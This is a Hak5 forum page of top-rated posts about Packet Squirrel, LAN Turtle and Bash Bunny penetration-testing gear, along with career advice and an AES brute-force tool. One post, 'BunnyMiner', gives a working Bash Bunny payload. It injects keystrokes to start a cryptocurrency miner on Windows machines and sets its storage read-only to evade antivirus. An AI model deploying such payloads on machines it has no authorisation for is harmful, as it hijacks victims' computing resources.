Jump to content
Hak5 Forums


Popular Content

Showing content with the highest reputation since 09/23/2017 in all areas

  1. 9 points
    I think we may do a pre-order next week leading up to the launch on Friday, but it wouldn't be publicized really. Just something special for us cool peeps on the forums & IRC.
  2. 6 points
  3. 6 points
    Just working on securing a venue for a Hak5 event in San Francisco mid October to introduce you all to our new furry friends. 🐿️🐿️🐿️
  4. 5 points
    Here's the official specs: Atheros AR9331 SoC at 400 MHz MIPS 16 MB Onboard Flash 64 MB DDR2 RAM 2x 10/100 Ethernet Port USB 2.0 Host Port 4-way payload select switch RGB Indicator LED Scriptable Push-Button Power: USB 5V 120mA average draw Dimensions: 50 x 39 x 16 mm Weight: 24 grams
  5. 5 points
    I do enjoy reading posts like this while having a coffee :) never fail to entertain. Makes me wonder if its one of you lot doing a windup :P
  6. 5 points
    Sample code! https://pastebin.com/aZyyS16w
  7. 5 points
    Currently working on a PoC - we'll see how well it works.
  8. 5 points
    Pre-orders would be filled day of release on the morning of the 20th. I'll update this thread early next week when it's ready -- I just need to coordinate with Sara and Jayson first to make sure this doesn't break anything =P
  9. 4 points
  10. 4 points
    The needle on the bullshit meter just flew off. Having worked and occasionally still work for school districts in the US, I can say that yes, the school can confiscate anything that a student uses on school property that damages the property. The network is school property.
  11. 4 points
    So sad to hear of the passing of Kerby...after so many years, I know how it feels. And Kerby loved to be on camera.... Darren, you have my greatest sympathy...
  12. 3 points
    Hey everyone, Version 1.4 of the Bash Bunny firmware is now available! With it comes an important fix which will prevent the device from boot-looping when an invalid update file is put onto the root of the Bash Bunny's storage partition. A bug in the Bash Bunny's QUACK command has also been fixed and all underlying packages have been updated. Find all the fixes and features in the changelog and bounce on by to BashBunny.com/downloads for your devious device download (\_/)
  13. 3 points
    You forgot NETMODE TRANSPARENT wget https://packetsquirrel.com BUTTON 1m && { echo "Discount unlocked!" LED FINISH } || { echo "Timeout dude!" LED FAIL }
  14. 3 points
    From the picture of: https://twitter.com/digininja It reads: The packet squirrel by Hak5 is a pocket sized Ethernet multi-tool for penetration testers and system administrators. Packet captures, MITM and remote access are made easy with its simple scripting language. online payload library and initiative interface. Flip the switch to desired payload, plug it in and get instant feedback from the multi-color LED.
  15. 3 points
    Soon-ish :-P Or one of my favorite things I did at DerbyCon 2016 booth...
  16. 3 points
    This was a very entertaining read. Thanks for the chuckle.
  17. 3 points
    By the way, does this look like a pentester, or some kids? https://twitter.com/jonbush1234 Where the profile pick for "Clarence" comes from. https://twitter.com/jonbush1234/status/914948133163061249 looks like maybe Mr "Clarence" needs help learning how to use his new rubber ducky. @Clarence will the real slim shady please stand up - https://www.twitch.tv/videos/173897157 After some digging, looks like he is 15yrs old, born in 2002. How long before a thread lock? I think he's suffered enough...
  18. 3 points
    This. Sorry, I don't believe for a moment that you aren't allowed to confiscate it. Schools are well within their rights to confiscate mobile phones, knives, and anything else them deem unsafe, inappropriate or a breach of their rules. The Rubber Ducky falls within this.
  19. 3 points
    They deliberately left out a part that said the students couldn't attack your network to make the job of a pen tester easier. Your first message sounded suspicious, this is now incompetent and suspicious.
  20. 3 points
    Confiscate the ducky and read the script.
  21. 3 points
    ::cracks knuckles:: Time to fire up Burp Suite.
  22. 3 points
    Yes. $0 if you're one of the first 100 at the party. $40-50 if you're not. There'll be other new devices too -- it's not just a Packet Squirrel launch party, it's en entire Hak5 Gear event ^_^
  23. 3 points
    Posting this to the community here first. Goes live in the morning 😉 https://hak5.org/rsvp Hope to see you in San Francisco - and if not IRL, soon after here ☺ 🐿️🐿️🐿️
  24. 2 points
    The Hak5 Gear Ethernet line consists of the Packet Squirrel and LAN Turtle (classic, SD, 3G). The LAN Turtle and Packet Squirrel are well suited for similar applications - remote access, man-in-the-middle attacks, packet sniffing, secure tunneling and network recon. Their biggest differences are their hardware (interfaces and appearance) and software (modules vs payloads). This affects how they are deployed, their stealth factors (for covert ops) and what actions are performed. Key Differences The LAN Turtle is best suited for long-term deployments at a client's facility to provide penetration testers with remote access to their network. Typically a social engineering operation is to plant a LAN Turtle on the target network with retrieval when the engagement has ended. Disguised as a USB Ethernet adapter, the LAN Turtle can provide this role uninterrupted. If remote access is guaranteed up front, the LAN Turtle (3G especially) can be shipped to the client site with simple instructions for deployment. The Packet Squirrel is an Ethernet multi-tool. It can provide a range of penetration testing functions, though it is equally suited for IT professionals and tech enthusiasts. The barrier to entry is lower since it relies on a simpler payload system of scripts. With the right scripts it can generally perform all of the functions of the LAN Turtle, however it is not as stealthy. Depending on how it is concealed it may not be as effective at long term deployments as the LAN Turtle. Applications Remote Access: Both are capable of providing encrypted remote access into a network. The LAN Turtle may be more stealth - disguised as a USB Ethernet adapter - and the 3G version bypasses perimeter defenses by bringing its own Internet backhaul. Man-in-the-Middle: The LAN Turtle can only perform MITM attacks against computers while the Packet Squirrel can be plugged inline between any two arbitrary Ethernet links (before computers, network printers, IP cameras and the like). Packet Sniffing: The Packet Squirrel is best suited at capturing packets to USB disks between any Ethernet segment using the built-in tcpdump payload. The LAN Turtle SD works similarly, logging to an internal MicroSD card - but only against a single computer. Secure Tunneling: Both devices can be used to secure network traffic, however the Packet Squirrel is better suited for this task using it's built-in openvpn payload. Only minimal configuration is required and any network device may benefit from it as a hardware VPN router. The LAN Turtle can perform this task, albeit only for a single computer using a module. Network Recon: Both devices are equally capable of performing network reconnaissance, e.g. nmap scans. Typically these scans are completed within a few minutes and do not require a large amount of storage. Currently (10-22-17) a nmap module is available for the LAN Turtle while a similar payload for Packet Squirrel is not. That said, a payload is expected soon and when it arrives the user experience will be easier, considering the Packet Squirrel's hardware. Software The LAN Turtle uses a module system while the Packet Squirrel uses a payload system. Both modules and payloads are free open source software add-ons contributed by the community and available from a central git repository. Modules are downloaded to the device "over the air" and come with their own interface for configuration. Setting up a module usually entails entering a few key pieces of data into a graphical user interface. Multiple modules may be enabled to run simultaneously when the device is deployed. Payloads are downloaded to the device manually, or via an updater app, in the form of one or more text files. Configuring a payload consists of editing the text file and changing values, typically at the beginning of the file. Multiple payloads may be carried and assigned to the various switch positions, however only one payload may run at once. Hardware Interfaces: The Packet Squirrel features two standard RJ45 Ethernet jacks and can therefore be installed inline between most any network segment. The LAN Turtle features one standard RJ45 Ethernet jack and one standard USB Type-A plug for power and USB Ethernet. Because of this it may be powered from any ordinary USB power source and connected to a network, however it can only be planted inline between a computer and network. Power: Both may be battery powered, but in the case of the LAN Turtle powering from a USB battery means that it is no longer suited for inline (MITM,Packet Sniffing) applications. Both have very low (~100-200 mA) power draw, so running off high capacity USB battery banks is a possibility. Feedback: The Packet Squirrel features an RGB LED for feedback. Its LED command is compatible with the Bash Bunny LED syntax, so standard payload states are easily distinguished. The LAN Turtle typically provides feedback to the penetration tester via software. E.g. the establishment of a SSH reverse shell. While it features two static programmable LED indicators, one yellow and one green, modules seldom take advantage of this hardware. Setup: The LAN Turtle has no special hardware for setup -- all modules are enabled or disabled in software. The Packet Squirrel provides a payload selection switch allowing the operator to choose the appropriate payload at runtime. Interaction: The Packet Squirrel provides a button for interaction with payloads. The LAN Turtle's button is not exposed to the user (inside case) and is only used for reset and recovery.
  25. 2 points
    It's a great companion to the USB attack tools, with the right payload. You'll see. Basically drop the Squirrel as a listener for an accompanying payload on the Duck/Bunny. Working on something special for that. Also, noted hardware request.
  26. 2 points
    I got you fam. Preshow: The main event: I was there. It was dope.
  27. 2 points
  28. 2 points
    Heh, made you look! 🤣😂🤣😂🤣😂
  29. 2 points
    https://github.com/michael-weinstein/veraT It gets the tumor and normal tissue DNA exomes and the tumor RNA. It extracts the patients HLA type (immune system markers) form the normal tissue DNA, finds the tumor-specific mutated proteins by comparing the tumor and normal DNA, and then looks at the RNA to figure out if the mutated proteins are likely being made. It then takes the mutated protein sequences and the HLA types and predicts which of these mutant proteins are going to be best presented to the immune system, which essentially gives the most immune-vulnerable changes in the cancer. Once that happens, we can try to target those things for an immune response.
  30. 2 points
  31. 2 points
    Its a script to test for the vuln not the attack script "Remember that this is not an attack script!" & "we are already releasing this code because the script got leaked"
  32. 2 points
    Interesting. If I can confirm this issue, we'll get it fixed and pushed out Friday.
  33. 2 points
    Kid, don't run any ducky scripts anybody gives you here. At this point, they're all going to be rm -rf / and fork bombs. Also, there's very little interesting stuff you can run on a chromebook that's not rooted and running... uh... not chromeOS.
  34. 2 points
    ... Stop. Just stop. You are paid to do a job, they don't have to pay you less due to leaving out part of an AUP. At this point I am convinced you are lying, and are a student trying to get around a firewall in your school by having us write a script for a USB Rubber Ducky for you.
  35. 2 points
    Forgive the scepticism but this is a variant of the "how do I hack my wife's Facebook account?". We have no idea who you are, whether you have permission to do what you are doing or anything else. My generic suggestions would be to check the logs, check the config for anything that appears to be more open than it's supposed to be and try asking the student, he may be happy to boast about how he did it in return for a less harsh penalty.
  36. 2 points
  37. 2 points
    $40-50 for the packet squirrel? What about the other two? How much to get all three?
  38. 2 points
    Maybe relevant? https://depthsecurity.com/blog/unauthorized-flir-cloud-access
  39. 2 points
    After 3 months of work I've released version 0.1 of Abrute. Abrute is a Multi-threaded AES brute force file decryption tool. It has much of the same character sequencer support that the crunch tool does. I've spent a good portion of my development time discovering and implementing sequence algorithms to shave off as many wasted CPU cycles as I can and I feel pretty good about it. The beauty of it is that it works. Now the computers I own only have 4 cores so I'm limited in the amount of processing power to get work loads done. I can say that with a finite amount of cores the workload goes up exponentially as the password length goes up. Also true for the longer a character set is to work with. I so want the new AMD Thread-Ripper with all its cores. My journey started with finding some of my old archived encrypted files and discovering I am unable to remember the password correctly. This led me to look for answers on Security/StackExchange. I went from creating a detailed question, as I was unable to find the answers I was looking for, and got a few small tips pointing me towards the tool known as crunch. I have answered my own question on the forum with many helpful ways I've tried to implement a solution to opening my AES encrypted files. That thread is here: https://security.stackexchange.com/questions/161592/how-to-brute-force-a-somewhat-remembered-aescrypt-password On that thread I first developed a likely word list with shuffling sequences, ordering, and generating plenty of output to test against. That didn't open the file for me but that code has already helped one other person open their encrypted file. Next I learned how to do the equivalent of multi-threading with only using Bash and xargs which will let you spin up parallel processes to run across all your cores. And that works well with crunch. But this was a bit crude as I had to let it run many weeks and could only check the progress by peeking into data being passed through Linux pipes. Not to mention a power outage had me lose a good chunk of progress. So yeah, I wanted to have something better. So I wrote Abrute. I ended up rewriting most of the crunch tool into my own sequencer with my algorithm improvements to save CPU cycles. And the attempts for decrypting are all calls to the aescrypt command for now. But the threading work is handled brilliantly (some one elses library) and at the moment I have Standard Out including progress. Over time I plan to write my own code for decrypting AES files and drop the need for the aescrypt executable. I also want to add GPU support for processing with ArrayFire but I first need to look into how feasible this is. Abrute works well on Mac and Linux and is untested on Windows (it shouldn't take too long to try it out on Windows). The commands are fairly straight forward and detailed in the help you get with -h. You can set the range of characters, character set, limit adjacent same characters, and start point. This uses your CPU cores at 100% so you'll likely need to do this work on a secondary system. I'm playing with the idea of divvying out the work to the cloud. You can rent an Amazon multi-core system for around 64 cores @ $3 to $5 an hour. So I can only imagine the performance gains from splitting the work across so many systems and system cores. Benchmarking is next for my project. I plan to have this program be one of those system benchmarks that everyone compares their computer by . I have some numbers from the original bash/crunch/xargs: At two character passwords I got about 35 passwords tried per second, at 3 character passwords I get about 12 passwords tried per second. At 8 characters with 4 cores a month isn't out of the question. So long passwords would be a long term commitment to try to crack unless you own Amazon or the like . I may never get my files open again. I have a tendency towards longer passwords. But this whole journey has been an amazing learning experience for me allowing me to sharpen many skills and develop many new ones. Anyway I hope you all find this tool useful. I'll get back to you with the newer benchmark numbers when I have them. Feel free to contribute to the project in any way. _I have enough details for you to get it running on a Docker image so cloud is already possible._ I'm just excited about it. Enjoy! ~6ftdan
  40. 2 points
    BunnyMiner By Ar1k88 I'm going to "quietly" sneak this onto the thread... **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PC'S! MYSELF, & MINERGATE DO NOT ENCOURAGE SUCH USE! **** Anyways, this is just a Simple CPU Miner from my Collection of Odd Scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner, yes it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :) payload.txt #!/bin/bash # # Title: USB CPU Miner # Author: Ar1k88 # Version: 1.1g # Target: Windows 7-10 # Category: Exploiting Resources # Sub-Category: Cryptocurrency # # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB. # # Please change the credentials in "config.txt" to this format: # <algorithim> # <pool stratum> # <username/wallet> # <cores/threads> # # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip # Extract the EXE's and use the x86 (32Bit) version due to it supports both 32Bit and 64Bit CPU # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe". # Enjoy! -Ar1k88 # Grace-period for PC to recognize the BashBunny. Q DELAY 300 # Setting up and Attacking! CHARRRRGGGEEE!!! LED ATTACK # NOTE: Setting to Read-Only Storage to prevent Anti-virus's from removing binary files. (EXE's) ATTACKMODE HID RO_STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')" LED FINISH 1.cmd @echo Off cls REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is. REM -Ar1k88 SetLocal EnableDelayedExpansion Set n= Set ConfigFile=%~dp0\config.txt For /F "tokens=*" %%I IN (%ConfigFile%) DO ( Set /a n+=1 Set var!n!=%%I ) echo %var3% call %~dp0\2.exe -a %var1% -o %var2% -u %var3% -p x -t %var4% pause EndLocal @exit /B Config.txt is set up as following: <algorithm> <stratum> <email/wallet> <threads/cores> config.txt cryptonight stratum+tcp://aeon.pool.minergate.com:45550 [email protected] 2 Enjoy! P.S. - If you want to sign up to show this off to your friends or for work. Can easily create a account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
  41. 2 points
    If you don't have a background in Information Technology, ie: no formal training, at a minimum, get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in, if you don't have some sort of foundational grasp of things. Comptia Network+, Linux+(even an A+ class, but not required) and a basic windows MCP class, should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as System Administrators and networking backgrounds before going the other side. Not a requirement, but will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, and some form of file sharing and network administration, ie: Active Directory, SMB/Samba, and Windows and Linux OS command line use, will greatly help you in the long run. Offsec's PWK, is more or less entry level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational, and very instructional, but it's a 100% hands on, you need to physically do the task, to pass. Part video, part text instructional, you'll spend most of your times, in a VPN'ed virtual lab, performing real attacks against actual installed machines setup with real world vulnerabilities or mis-configurations, and all networked, like a real corporate network, allowing you to attack one machine and pivot through the network to others. SANS is also a really good class, but I wouldn't consider either theirs or offsec to be, hey, took the class, now I'm a pro. It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest, SANS being a number of courses some of which may only be instructional and multiple choice questions, OSCP and other offsec courses are all hands-on, you have to perform actual hacking tasks, to pass, and no multiple choice questions. You also have to write an actual pentest report, which is a part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job. If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, Youtube, Google and Security Tub can help. Look into the following materials, which you don't have to take the vertifications, but can still read the books on the topics to get more well rounded: CompTIA Network+ CompTIA Linux+ CompTIA Security+ Microsft MCP books for MCSA/MCSE Setup a home lab with some virtual machines, setup a domain controller with windows server, an Active Directory domain, network some client computers to it, and try out some CTF's from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWk/OSCP and then maybe SANS.
  42. 2 points
    Yep, I've got a links page for each device, linked in the main "README.md". I'll add the Github Wiki for the Pineapple to the Pineapple's links page and add the Hak5 Github to the main README though, thanks.
  43. 2 points
    You could buy a cheap router that will take openwrt. Plug the wan side into your existing router and run WiFi and wired off openwrt instead. You'd then have a Linux box you could ssh to and use tools like tcpdump to watch traffic as you would be in the middle of everything.
  44. 2 points
    Question one: I can put whatever IP I want in a device, it doesn't have to use DHCP. An IP of with a netmask of and default gateway of may work fine on your network depending on the set up. Question two: you plugged into a switch, not a hub. You being in promiscuous mode means you see everything you are sent but the switch will only send you traffic meant for you which means your IP and broadcast traffic. What you are expecting is what you'd get off a hub or a span port.
  45. 2 points
    Why wipe the machine? If you created a new user, take ownership of the old account/files, and move their files over to the new profile, then nuke the old user profile. I actually do this for people when I fix their machines and they've broken their profile somehow. No need to reinstall everything unless you believe there is malware on it.
  46. 2 points
    @Darren Kitchen. Do we get any hints? We have been waiting for weeks to catch even the slightest details!!!
  47. 2 points
    The last I have heard is that more details will be available in early October. When / how is up to Darren :) I'd love to say more, but my hands are tied.
  48. 2 points
  49. 2 points
    Throw us a bone, @Sebkinne! :)
  50. 2 points
    Ahem... So does being mid Sept. constitute appeasing our endless anticipation with at least another hint? Can't blame a fellow for trying right...